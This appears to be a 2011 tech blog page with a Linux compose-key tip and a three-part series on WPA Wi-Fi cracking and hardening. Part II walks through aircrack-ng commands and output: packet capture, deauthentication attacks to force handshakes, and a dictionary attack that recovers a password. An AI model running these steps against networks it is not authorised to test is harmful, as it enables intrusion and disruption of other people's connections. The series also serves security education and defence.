
October 27, 2011

Hidden Linux : Recomposing Composers


I was recently faced with providing foreign language accent characters in Linux. Most word processors allow you to do this graphically -- via the Insert / Special Characters function in LibreOffice or OpenOffice, for example -- but this soon gets tedious for anything but the occasional insert. Doing it straight from the keyboard would be considerably quicker...

There are a number of ways to achieve this in Linux. Here's what I reckon's the easiest.

Open a console session and type:

setxkbmap -option compose:ralt

And that's it! What you've done is assign a special Linux key called <compose> to the right-hand ALT key -- that's the one to the right of the Spacebar. (You could of course assign it to any key you like, but personally I never use "ralt".)

Now, hold down the <compose> key and type <`> followed by <e> and you get an accented è (that's the grave accent), while <compose> + <'> + <e> yields é (with an acute accent).

Note that you can use these keys in any application. And that's just the beginning!

Using <compose> you can generate hundreds of different symbols. To get an idea of the possibilities, take a look at the file /usr/share/X11/locale/en_US.UTF-8/Compose.

Here are just a few of the characters you can create straight from the keyboard. (I've rendered them in a large font so they display better.)

   ÷   ©   ®
   ô   ø   µ
   å   ♥   ¶
   £   €   ¥
   ₨   ß   ç
   ň   ŋ   ƶ
   à  ±   ☭


And here are the key combinations I used to create them:

<compose> + <:> + <->
<compose> + <o> + <c>
<compose> + <o> + <r>

<compose> + <^> + <o>
<compose> + </> + <o>
<compose> + <m> + <u>

<compose> + <o> + <a>
<compose> + <?> + <!>
<compose> + <<> + <3>

<compose> + <P> + <P>
<compose> + <l> + <->
<compose> + <e> + <=>

<compose> + <y> + <=>
<compose> + <R> + <s>
<compose> + <s> + <s>

<compose> + <,> + <c>
<compose> + <c> + <n>
<compose> + <n> + <g>

<compose> + </> + <z>
<compose> + <_> + <A>
<compose> + <+> + <->
<compose> + <C> + <C> + <C> + <P>
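The chords above are exactly what the rules in that Compose file encode, one "<keysym> <keysym> ... : "result"" line per sequence. Here is an added example, not part of the original column, that parses a constructed excerpt written in the file's format and resolves the article's chord notation against it; the excerpt lines and the PUNCT_KEYSYMS mapping are mine, modelled on the real file rather than copied from it.

```python
import re

# Constructed excerpt in the layout of /usr/share/X11/locale/en_US.UTF-8/Compose;
# the lines are modelled on that file's format, not copied from it.
SAMPLE_COMPOSE = r'''
include "%L"    # the real file pulls in the locale's default table this way
<Multi_key> <colon> <minus>        : "÷"   division    # DIVISION SIGN
<Multi_key> <o> <c>                : "©"   copyright   # COPYRIGHT SIGN
<Multi_key> <less> <3>             : "♥"   U2665       # BLACK HEART SUIT
<Multi_key> <grave> <e>            : "è"   egrave      # LATIN SMALL LETTER E WITH GRAVE
<Multi_key> <C> <C> <C> <P>        : "☭"   U262D       # HAMMER AND SICKLE
<Multi_key> <quotedbl> <quotedbl>  : "\""               # an escaped quote inside the result
'''

# X keysym names for the punctuation keys used in the article's chords.
PUNCT_KEYSYMS = {
    ':': 'colon', '-': 'minus', '<': 'less', '`': 'grave', "'": 'apostrophe',
    '^': 'asciicircum', '/': 'slash', '?': 'question', '!': 'exclam', '=': 'equal',
    ',': 'comma', '_': 'underscore', '+': 'plus', '"': 'quotedbl',
}

# A rule is a run of <keysym> tokens, a colon, then the quoted result (with \" and \\ escapes).
RULE = re.compile(r'^\s*((?:<[^>]+>\s*)+):\s*"((?:[^"\\]|\\.)*)"')

def parse_compose(text):
    """Map each key sequence (tuple of keysym names) to the string it produces."""
    table = {}
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:            # blank lines, comments and include directives carry no rule
            continue
        keys = tuple(re.findall(r'<([^>]+)>', m.group(1)))
        table[keys] = re.sub(r'\\(.)', r'\1', m.group(2))  # drop the backslash of an escape
    return table

COMPOSE_TABLE = parse_compose(SAMPLE_COMPOSE)

def compose(*chars):
    """Resolve a chord written the article's way, e.g. compose('o', 'c'), to its character."""
    sequence = ('Multi_key',) + tuple(PUNCT_KEYSYMS.get(c, c) for c in chars)
    return COMPOSE_TABLE.get(sequence)

if __name__ == '__main__':
    for chord in (('o', 'c'), (':', '-'), ('<', '3'), ('C', 'C', 'C', 'P')):
        print(' + '.join(f'<{c}>' for c in ('compose',) + chord), '=', compose(*chord))
```

Point parse_compose at the real file's contents to get the full table; sequences that have no rule come back as None.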



(And in case you're wondering about this column's title, it's a subtle homage to a certain Monty Python classic...)



Follow Geoff Palmer on Twitter

October 17, 2011

Cracking WPA wireless networks

Part III: Securing Your Wireless Network

Wireless networks are wonderfully convenient but, as we've seen, they're also vulnerable to being hacked. Here's how to make it hard for hackers!


Essential Measures

1. Use a proper password
What makes a good password? Anything that's not in a dictionary for a start! If you want to use something memorable, think passphrases rather than passwords. "2 bee 0r NoT two-B" is vastly more secure than "To be or not to be", but for real security you can't beat long strings of properly randomised junk. How about

bT6i3W429TQRxnefaD1xtZc3b6kgit2eMbk52S0ndK1Km5upS2AI9iakyTZIvqt

or

<CL$8L=noSj+^1)5<4LTaB7#R%PHH2-204V^_fj.@t:%kpsO0p,vJOS8<-qEOm^

Now they're what I call passwords! Both come from Steve Gibson's Perfect Passwords generator. You don't have to use the whole string; just the first 10-12 characters would do. If you do use the whole string, you'll need to save it on a USB stick, which makes it a little less convenient, but no one's ever likely to crack your network.


2. Change the default password
Don't let a hacker reconfigure your hardware! Your wireless router will come with a default password. Change it! There are plenty of lists around (like this one) containing default logins and passwords.


3. Enable encryption
Without encryption, anyone can capture your wireless traffic! Use WPA2 in preference to WPA. Don't ever use WEP; it can be cracked in minutes.


4. Update your firmware
Things change; new vulnerabilities are discovered daily. Check that your router's running the latest firmware.


5. Use HTTPS for management
If you manage your router wirelessly, do so via (encrypted) HTTPS rather than regular HTTP. With the latter, your router's login name and password will be broadcast in clear text.



Useful Measures

6. Disable SSID broadcast
Disabling the broadcast of the SSID (Service Set Identifier) will essentially hide your network from casual passers-by. Experienced hackers will still detect it easily, but it takes a little extra work and suggests the owner has a little extra savvy, so they may go for an easier target.


7. Turn on logging
Router logs are often disabled by default. Turn them on. Some routers will even email you about suspicious activity. Invaluable!


8. Switch it off!
If you're going away for a while, turn off your router -- or at least switch off Wi-Fi. If it ain't broadcasting, it can't be hacked!



Not So Useful Stuff

9. Filter MAC addresses
Every piece of networked equipment has a unique Media Access Control (MAC) address, and at first it would seem to be a good idea to only allow access to particular devices. But the internal tables are a pain to maintain -- you'll have to determine and add the MAC address of every new piece of equipment you connect -- and they're trivially easy to spoof anyway, so Not So Useful.


10. Disable DHCP
Again, I put this in the Not So Useful category merely because it's a pain to maintain. With Dynamic Host Configuration Protocol (DHCP) enabled, new devices are automatically assigned IP addresses. With it disabled, they have to be assigned manually. For most casual users that's just a hassle.



October 5, 2011

Cracking WPA wireless networks


Part II: The crack


Having assembled the tools, it's time to get to cracking. Literally!

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

Also note that in the examples that follow I've randomly altered network names and MAC addresses.

(I used the Slitaz Live Aircrack-ng Distribution on a USB stick for this attack. It's Linux, of course, so if you're running from Windows, the command syntax may be slightly different.)



1. Start monitor mode
Aircrack-ng is a suite of command-line tools, so open up a console window.

The first step is the critical one. You need to put your wireless card into monitor mode:

airmon-ng start wlan0

Here's what that yielded on my laptop:

Interface       Chipset          Driver

wlan1           Broadcom         b43 - [phy0]
wlan0           Realtek RTL8187L rtl8187 - [phy1]
                                 (monitor mode enabled on mon0)


Success! But only on the USB wireless card. The laptop's built-in Broadcom card may work with a driver, but that could require a lot more work.



2. Scan for targets
Okay, let's see what networks are out there that we can monitor ...

airodump-ng mon0

Airodump-ng is a wireless packet capture tool that details all the access points and clients within range.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID
                   
 00:16:50:59:52:9C  -50       63        1    0   6  54e  WPA  TKIP   PSK  Scuba
 00:22:75:31:11:5A  -51       32        3    0   1  54e  WPA2 CCMP   PSK  MyNetwork
 00:12:34:56:98:AB  -53       47        2    0   3  54e. WPA2 CCMP   PSK  Target_Net
 00:11:95:DD:8D:99  -60       16        2    0   1  54   WEP  WEP         Private Network
 00:22:74:52:86:3F  -61       28       16    0   7  54e  WPA2 CCMP   PSK  Belkin_N_Wireless_02843F
 00:02:63:50:20:22  -61       30       43    0   9  11 . OPN              OpenNet
 
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:12:34:56:98:AB  00:11:EF:8B:62:77  -39    0 -36e     0        6  Target_Net  



Hit Ctrl+C to stop the capture and note the target's Channel number and BSSID for input into the next step. (Note that I'm targeting a WPA2 network. That WEP would just be too easy!)



3. Begin the capture
We now want to capture just the data going to a particular target. We do so using the following syntax:

airodump-ng -c (channel) -w (name of the capture file) --bssid (bssid) mon0

So targeting Target_Net (above) would give us ...

airodump-ng -c 3 -w Test_Data --bssid 00:12:34:56:98:AB mon0

 CH  3 ][ Elapsed: 4 mins ][ 2011-10-04 21:42 ]
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net



Now we can simply wait for a WPA handshake to occur, or we can try and push things along.



4. (Optional) Forcing a handshake
Open a new console window while the first continues running and use aireplay-ng to inject packets into the network to de-authenticate the client. When you do so, the client will re-authenticate via a WPA handshake, and that's exactly what we want!

aireplay-ng -0 3 -a 00:12:34:56:98:AB mon0

There are tons of options with aireplay-ng, but -0 3 (send three de-authentications) worked for me ...

21:43:34  Waiting for beacon frame (BSSID: 00:12:34:56:98:AB) on channel 3
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:43:34  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]


How do you know if it worked? Check the top right-hand corner of the first console and you should see confirmation.

 CH  3 ][ Elapsed: 5 mins ][ 2011-10-04 21:43 ][ WPA handshake: 00:12:34:56:98:AB
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net





5. Apply a little brute force
We have all the data we need; now it's just a matter of (hopefully) cracking the password. Locate the file where you saved the data in Step 3 and the password wordlist you downloaded last time, and run them through aircrack-ng. The format is:

aircrack-ng -w (dictionary file) (data file)

You'll see that Step 3 saved several files with different extensions. The one aircrack-ng needs is the .cap file, so in my case I run ...

aircrack-ng -w wordlist.txt Test_Data.cap

Now it's just a matter of waiting while aircrack-ng tries the possible password combinations.

                                 Aircrack-ng 1.1 r1904


                   [00:32:51] 850148 keys tested (455.42 k/s)


                           KEY FOUND! [ swedishchef ]


      Master Key     : 80 FD 4C 4D 72 34 5F 08 83 67 A0 E5 D3 73 06 EB
                       6B 9F D6 2D AA E4 EC C2 24 7D F7 D3 EF A7 6E FE

      Transient Key  : 97 13 7B FF DF 0A 29 07 85 3A 0F FA FC 4D 62 92
                       14 F8 33 9B 67 01 08 B3 DE 21 49 B9 53 F7 D9 FF
                       18 9A BA 40 B6 A3 2D 92 CB 27 A7 7A EE F6 7A F0
                       21 52 8E 50 00 14 35 F8 4A 0A 5D 49 BC 15 E2 08

      EAPOL HMAC     : 85 31 D0 6F 21 8F D7 7A D9 FA EF F1 66 4B 5A B2



Bingo! And there's our password. Simple as that!



So what can you do to maximise your security and prevent hacks like this? Read Part III, coming soon...!


October 2, 2011

Cracking WPA wireless networks

Part I: Assembling the tools

Wireless networks are everywhere, but many are insecure. The older WEP protocol has been thoroughly compromised and most users rely on the more robust WPA protocol. But a chain is only as strong as its weakest link, and that weak link is invariably the password used to secure the network. So I decided to try a little wi-fi cracking to see how easy it is ...

Wow! In little over an hour I went from neophyte to bona fide cracker, my first pwned network under my belt. It's disturbingly simple. Here's how I did it ...

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!


The basic toolset consists of three parts:
  1. aircrack-ng
  2. a wordlist
  3. a suitable wireless receiver

First, the easy stuff ...


The Software
Aircrack-ng isn't a single program; it's a suite of more than a dozen tools for auditing wireless networks. It runs under Linux and Windows, there's a version for VMware virtual machines, and there's even a proof-of-concept version for the iPhone.

Linux users can install the whole suite by simply selecting "aircrack-ng" from their distribution's repository. Other users can download the latest from aircrack-ng's site.

Another alternative is to download the ready-built Slitaz Live Aircrack-ng Distribution. It's a bootable Linux CD with aircrack-ng built in.

The other piece of software you'll need is a password wordlist. The way WPA cracking works is to take one word at a time from the wordlist and try it in various common combinations to see if its encoded form matches what's been captured. If this sounds slow and laborious, it is, but it's the sort of thing that computers excel at. Depending on your processor, it's possible to test many thousands of combinations per second.

Googling for "wordlists" will turn up dozens, in many different languages. I settled for the English dictionary from this collection. It contains a modest 300,000 possible passwords in a 1MB file. Obviously, the bigger the wordlist, the more likely you are to crack the password. If you're really keen, there's the Openwall Wordlist Collection, a 33GB whopper that costs around US$30.
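To put numbers on that "encoded form" and on the password advice in Part III, here is an added example, not from the original column or from aircrack-ng, that derives the WPA/WPA2-Personal key the way the standard does (PBKDF2-HMAC-SHA1 salted with the SSID, 4096 rounds) and works out how long an exhaustive search takes at the 455.42 k/s rate reported in Part II. The 300,000-word list and the 62- and 94-character alphabets of the example strings in Part III are taken from the page; the guess rate is assumed to hold for every candidate.

```python
import hashlib

# Guess rate reported by the article's aircrack-ng run: 455.42 thousand keys per second.
GUESSES_PER_SECOND = 455_420

def wpa_pmk(passphrase, ssid):
    """The 'encoded form' a cracker must compute for every candidate: WPA/WPA2-Personal
    derives its Pairwise Master Key as PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds,
    32 bytes). Standard derivation written here for illustration, not aircrack-ng's code."""
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)

def keyspace(alphabet_size, length):
    """Number of distinct strings of the given length drawn uniformly from the alphabet."""
    return alphabet_size ** length

def exhaust_seconds(candidates, rate=GUESSES_PER_SECOND):
    """Worst-case time to run every candidate through wpa_pmk at the given rate."""
    return candidates / rate

def describe(seconds):
    """Render a duration in its largest sensible unit."""
    for unit, size in (('years', 365 * 86400), ('days', 86400),
                       ('hours', 3600), ('minutes', 60)):
        if seconds >= size:
            return f'{seconds / size:,.1f} {unit}'
    return f'{seconds:.2f} seconds'

if __name__ == '__main__':
    # The SSID salt means a key computed for one network name says nothing about
    # another's, even for the same passphrase; precomputed tables only help per SSID.
    print('salted per SSID:', wpa_pmk('swedishchef', 'Target_Net') != wpa_pmk('swedishchef', 'Scuba'))
    # The article's 300,000-word list against 10 random alphanumerics (62 symbols)
    # and 12 random printable-ASCII characters (94 symbols), as in its example strings.
    for label, n in (('300,000-word list', 300_000),
                     ('10 random alphanumerics', keyspace(62, 10)),
                     ('12 random printable ASCII', keyspace(94, 12))):
        print(f'{label:26}  {describe(exhaust_seconds(n))}')
```

At that rate the whole wordlist is exhausted in well under a second, while ten random alphanumerics take tens of thousands of years, which is the whole of the argument for random strings over dictionary words.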


The Hardware
To begin cracking you'll also need a suitable network card, one that can be flipped into what's known as "monitor mode". The aircrack-ng website has a useful tutorial here: Is My Wireless Card Compatible?

If you do have a compatible card, use their Compatibility Drivers page to see if aircrack-ng will work okay with it, and what drivers you'll need, if any.

If all that sounds a bit daunting, you can simply buy a suitable USB network card and bypass the one in your PC. What is the Best Wireless Card to Buy? will help. I picked up a USB-based RTL8187L device for a little over $20.



We're now ready for the fun stuff. Part II coming soon ...!
